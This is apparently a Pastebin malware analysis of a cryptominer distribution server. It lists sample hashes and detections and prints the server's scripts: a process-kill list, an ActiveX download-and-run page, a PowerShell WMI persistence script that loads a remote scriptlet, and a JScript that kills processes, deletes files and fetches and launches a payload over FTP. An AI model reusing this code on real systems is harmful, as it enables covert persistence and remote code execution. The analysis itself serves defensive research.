Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- List all files:
- http://dwn.rundll32.ml:88/?tpl=list&folders-filter=&recursive
- Download all files in tarball:
- http://dwn.rundll32.ml:88/?mode=archive&recursive
- Filelist:
- 3.zip Password protected zip, John doesn't help
- 321.exe 6bbf24496ba12ae8f636a926090ccfee (43/67) Miner
- 32ja.exe 00bca411dca23f4588c92f71e3eb439b (51/68) Doublepulsar
- 32k.exe 7af20530a799302b069d2d44e9d879d4 (0/0) Unknown file
- 33.zip Password protected zip, John doesn't help
- 64.exe 1c72566993cdc1aeeae1b9730f70d805 (34/67) BitMiner?
- 64ja.exe a7df6218c11c5010016138c31d7b51b1 (47/68) Doublepulsar
- 64k.exe 67a0c1945293c2223496a105b95429ac (0/0) Unknown file
- a.exe c2e33815dadae01d21b2367b5d061ff6 (37/68) BitMiner?
- DownloaderActiveX.cab 8fd32442a54c1e5f71345b037f03365a (33/57) Downloader
- ie.swf 79983f8e633cba9af29ef4d8850ff887 (0/0) Unknown
- java.exe c9185ef6f065dfd97d17933d67ef6eac (52/67) Gamethief Magania
- kill.html See below
- map.htm See below
- mof.ps1 See below
- mof.txt See below
- n.exe 6ba244dd937bc848864583b5d38c8c2c (0/0) Unknown
- pgmysql 320399ae49e97e5368de08b777332e5f (0/0) Unknown ELF file
- we32.exe 6bbf24496ba12ae8f636a926090ccfee Same as 321.exe
- we64.exe 1c72566993cdc1aeeae1b9730f70d805 Same as 64.exe
- ---
- kill.html contents:
- rundll32.exe C:\*.exe 0
- ntvdm.exe c:\*.exe 0
- lsmo1.exe c:\windows\help\lsmox.exe 0
- taskmgr.exe c:\windows\ntuhost.exe 0
- lsmosee1.exe c:\windows\debug\lsmoseex.exe 0
- lsmose1.exe c:\windows\debug\0621.exe 0
- wowsiu.exe c:\windows\wowsiu.exe 0
- Tnteime.exe c:\windows\fonts\Tnteime.exe 0
- rmfxys.exe c:\windows\rmfxys.exe 0
- hz64.exe C:\Windows\debug\hzwk\hz64.exe 0
- gymaye.exe c:\windows\gymaye.exe 0
- NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0
- mscorsvw.exe c:\windows\debug\wk\mscorsvw.exe 0
- mssecsvc.exe c:\windows\mssecsvc.exe 0
- lsmosee.exe c:\windows\help\lsmosee.exe 0
- lsmose.exe c:\windows\debug\lsmose.exe 0
- w1ninit.exe c:\programdata\microsoft\dhcq\w1ninit.exe 0
- winin1t.exe c:\programdata\microsoft\dhcq\winin1t.exe 0
- Mining.exe %ProgramFiles%\mining.exe 0
- ---
- map.htm contents:
- Encoded javascript, decodes to:
- <script src=hxxp://cs[.]cskick[.]cn/cs/c.js></script></html></script></body><BODY><OBJECT ID=\"DownloaderActiveX1\" WIDTH=\"0\" HEIGHT=\"0\" CLASSID=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" CODEBASE=\"DownloaderActiveX.cab#Version=1,0,0,1\"><PARAM NAME=\"propProgressbackground\" VALUE=\"#bccee8\"><PARAM NAME=\"propTextbackground\" VALUE=\"#f7f8fc\"><PARAM NAME=\"propBarColor\" VALUE=\"#df0203\"><PARAM NAME=\"propTextColor\" VALUE=\"#000000\"><PARAM NAME=\"propWidth\" VALUE=\"0\"><PARAM NAME=\"propHeight\" VALUE=\"0\"><PARAM NAME=\"propDownloadUrl\" VALUE=\"hxxp://windows[.]rundll32[.]ml:88/java.exe\"><PARAM NAME=\"propPostdownloadAction\" VALUE=\"run\"><PARAM NAME=\"propInstallCompleteUrl\" VALUE=\"\"><PARAM NAME=\"propbrowserRedirectUrl\" VALUE=\"\"><PARAM NAME=\"propVerbose\" VALUE=\"0\"><PARAM NAME=\"propInterrupt\" VALUE=\"0\"></OBJECT></script></body></html>
- Note: hxxp://cs[.]cskick[.]cn is currently down
- ---
- mof.ps1 contents:
- $filterName = 'filtP1'
- $consumerName = 'consP1'
- $Command ="GetObject(""script:hxxp://windows[.]rundll32[.]tk:88/mof.txt"")"
- $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance Isa 'Win32_LocalTime' And TargetInstance.Minute = 30 And TargetInstance.Second =30"
- $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
- $WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ScriptingEngine='JScript';ScriptText=$Command}
- Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
- Note: hxxp://windows[.]rundll32[.]tk:88 seems to be older address that is currently unavailable
- ---
- mof.txt contents:
- <?xml version="1.0"?>
- <package>
- <component id="testCalc">
- <script language="JScript">
- <![CDATA[
- var toff = 3000;
- var url1 = "hxxp://windows[.]rundll32[.]tk:88/kill.html";
- http = new ActiveXObject("Msxml2.serverXMLHTTP");
- fso = new ActiveXObject("Scripting.FilesystemObject");
- wsh = new ActiveXObject("WScript.Shell");
- http.open("GET",url1, false);
- http.send();
- str = http.responseText;
- arr = str.split("\r\n");
- for (i = 0; i < arr.length; i++) {
- t = arr[i].split(" ");
- proc = t[0];
- path = t[1];
- dele = t[2];
- wsh.Run("taskkill /f /im " + proc, 0, true);
- if (dele == 0) {
- try {
- fso.DeleteFile(path, true);
- } catch (e) {}
- }
- };
- var t;
- var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
- wsh1 = new ActiveXObject("WScript.Shell");
- var service = locator.ConnectServer(".");
- var properties = service.ExecQuery("SELECT * FROM Win32_Process");
- var np = new Enumerator (properties);
- for (;!np.atEnd();np.moveNext())
- {
- t=t + np.item().Name + "\n";
- }
- if(t.indexOf("ieplare.exe") > -1){
- }else{
- wsh1.Run("cmd /c echo open ftp[.]rundll32[.]tk 25>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\\windows\\ieplare.exe>>ps&echo get c.rar c:\\windows\\config.json>>ps&echo bye>>ps&ftp -s:ps&del ps&start c:\\windows\\ieplare.exe");
- }
- ]]>
- </script>
- </component>
- </package>
- Note: test:1433@ftp.rundll32.tk:25 is currently down
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement